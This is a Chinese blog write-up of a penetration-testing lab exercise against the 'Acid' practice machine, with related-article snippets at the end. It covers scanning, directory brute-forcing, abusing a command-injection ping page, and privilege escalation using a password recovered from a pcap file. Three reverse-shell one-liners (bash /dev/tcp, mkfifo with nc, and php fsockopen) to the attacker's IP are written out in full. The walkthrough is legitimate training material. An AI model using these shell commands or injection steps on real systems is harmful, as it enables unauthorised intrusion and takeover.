靶机实战-Acid

最新推荐文章于 2024-04-14 06:53:52 发布
最新推荐文章于 2024-04-14 06:53:52 发布
阅读量789 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43870289/article/details/104087024
版权

Acid靶机实战

文章目录

1、主机发现

在这里插入图片描述
目标主机:192.168.232.160
我是用arp命令扫的,大家可自行选择

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述

4、访问8080端口

在这里插入图片描述
只有一个文件,点击就会下载,先pass

5、访问33447端口

在这里插入图片描述
查看网页源代码:
在这里插入图片描述
发现一串16进制的数,转化成字符:
在这里插入图片描述
d293LmpwZw==
base64在转化://得到 wow.jpg
在这里插入图片描述
是张图片,找找网站有没有存放图片的路径:
在这里插入图片描述
把/wow.jpg加上看看
在这里插入图片描述
保存图片到本地,查看有没有隐藏什么信息,用Nodepad++打开。发现最后有一些数字,看着像16进制
在这里插入图片描述
然后利用txt把:替换为空
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
到这网页上的东西就解出来了,就一个图片
然后扫一下其它目录://kali中启动DirBuster,暴力破解web目录
在这里插入图片描述
在这里插入图片描述
扫描出来的 /Challenge 目录与上面网页的标题相对应,访问一下:
在这里插入图片描述
访问此目录下的php:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现cake.php中点一下login就会跳转到index.php登录页面,而且标题跟 /Challenge 标题格式是一样的,果断加到url后打开看看:
在这里插入图片描述
根据报错提示说明还是存在这个页面的,继续爆破一下目录看看有没有别的可以访问的页面:
在这里插入图片描述
发现了一个command.php页面,估计是直接命令执行的页面:
在这里插入图片描述
可以执行ping命令,利用bp抓包看看:
在这里插入图片描述
命令可执行,直接反弹shell:
kali开启监听:
在这里插入图片描述
尝试使用bash -i >& /dev/tcp/192.168.232.158/4444 0>&1反弹shell
在这里插入图片描述
不行,改url编码:
在这里插入图片描述
在这里插入图片描述
还是不行…
尝试使用
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.232.158 4444 >/tmp/f
在这里插入图片描述
在这里插入图片描述
也不行…
尝试使用
;php -r ‘$sock=fsockopen(“192.168.232.158”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
在这里插入图片描述
在这里插入图片描述
点击go之后发现没有回包,去kali查看:
在这里插入图片描述
成功反弹shell

由于反弹shell的姿势多,一个不行就换,需要一个一个尝试

6、提权

查看/etc/passwd文件
在这里插入图片描述
重点关注的用户acid,saman
分别查看用户下的文件:
在这里插入图片描述
在这里插入图片描述
看到了第一条/sbin/raw_vs_isi/hint.pcapng,百度了一下是个能用Wireshark打开的流量抓包文件,下载下来打开看一下:
在这里插入图片描述
报错没有权限,执行su命令
在这里插入图片描述
必须在终端上运行,用python -c启动一个终端:
在这里插入图片描述
然后再执行scp那个命令:
在这里插入图片描述
用Wireshark打开:
在这里插入图片描述
发现用户名saman及密码1337hax0r
提权:
在这里插入图片描述
在这里插入图片描述
提权成功

滕财然
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
Acid-Reloaded
底层社会中的弱智
07-20 329
总结: Knock敲门程序是CTF中比较常见的,我们需要在规定时间内按照指定顺序对端口进行SYN的请求才能开放具有突破口的端口服务 Scapy模块可以灵活的构造数据包 对于可疑文件使用file binwalk strings等命令进行查看 Foremost命令可以分离文件 Nc –l port > x.x 用来接收文件 对于提权与渗透前期是一样的,都需要前期的信息收集,例如netstat查看当前开放的服务是否有机会提权,编辑器是否可以直接修改/etc/pass文件,.bash_histor
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2060
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
靶机实战系列之Tomato靶机(1),一次违反常规的鸿蒙大厂面试经历
最新发布
2401_84181885的博客
04-14 408
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。滑至文末,获取“searchall”下载链接!尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。并没有一句话木马,脚本已经被加载。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。
Acid靶场实战
m0_65149086的博客
05-04 369
云尘靶场,靶机渗透,Vulhnub,Acid
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1304
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7290
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
靶机渗透实战-Acid
qq_46540840的博客
02-04 3177
文章目录 这几天有点事情,靶机方面就没在更新,后边会积极的更新。 文章目录文章目录信息收集漏洞发现利用提权总结 信息收集 信息收集是必不可少的. 首先用自己的kali当攻击机,下载acid靶机 靶机下载地址 首先进行靶机发现 nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址) 然后对主机进行端口扫描 nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
靶机实战-blogger
ST0new的博客
04-05 3919
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
2021年全国职业院校技能大赛网络安全赛项C模块心得
旺仔Sec&blog
04-28 5220
靶机池网段例如: 物理机ip10.10.101.1,有30个队伍,那么靶机池ip从10.10.130.0/24开始,每个网段十台靶机,大概一百多台靶机靶机ip是10.10.130.241-250,每个靶机漏洞都不一样,五台linux,五台windows,每个网段所对应的靶机ip也不一样,例如10.10.130.241是ftp弱口令,那么10.10.131.245也有可能是弱口令,10.10.131.241可能是别的漏洞,所有靶机ip的d段都是241-250随机的。 漏洞linux和windows各一个
ACID: SERVER靶机入侵笔记
RestoreJustice的博客
03-16 167
这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片目录通常是这样命名。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。在tmp目录试了一下,wget、gcc命令不存在,这个靶机应该不能直接用内核提权,应该找一下看能不能找到密码。访问发现是一个邮箱登录页面,先记录下,看后面能不能找到账号密码,再次爆破目录。
【内网渗透】记一次靶机实战
kali_Ma的博客
11-24 1532
靶机难度属于中等靶机水平,全文思路就是信息收集,使用nmap或者masscan进行端口扫描,访问web页面,发现提示,接着使用wfuzz进行指定路径fuzz。然后找到py脚本,接着进行脚本分析,发现脚本存在的漏洞。构造poc然后进行反弹shell,反弹shell之后,发现存在另一个新的脚本,存在密码加密方式和密码本。进行解密,解密之后使用ssh进行远程登录。使用sudo -l发现xx路径下的python脚本拥有root权限,接着进行移动该目录写入提权语法成功提权。
靶机实战-DC-6
滕财然的博客
03-03 801
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
ACID: SERVER-VulnHub靶机学习第一篇
qq_27466929的博客
08-23 391
ACID: SERVER
各种靶机的搭建
qq_53365842的博客
04-20 3313
在docker环境搭建 搭建upload-labs靶机 (1)创建镜像 docker pull c0ny1/upload-labs (2)创建容器 docker run -d -p 8082:80 c0ny1/upload-labs:latest 搭建sqli labs 靶机 1.连接ssh 2.开启docker: sudo systemctl start docker systemctl status docker 3.docker 拉取镜像: docker pull c0ny1/sqli-labs:0.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值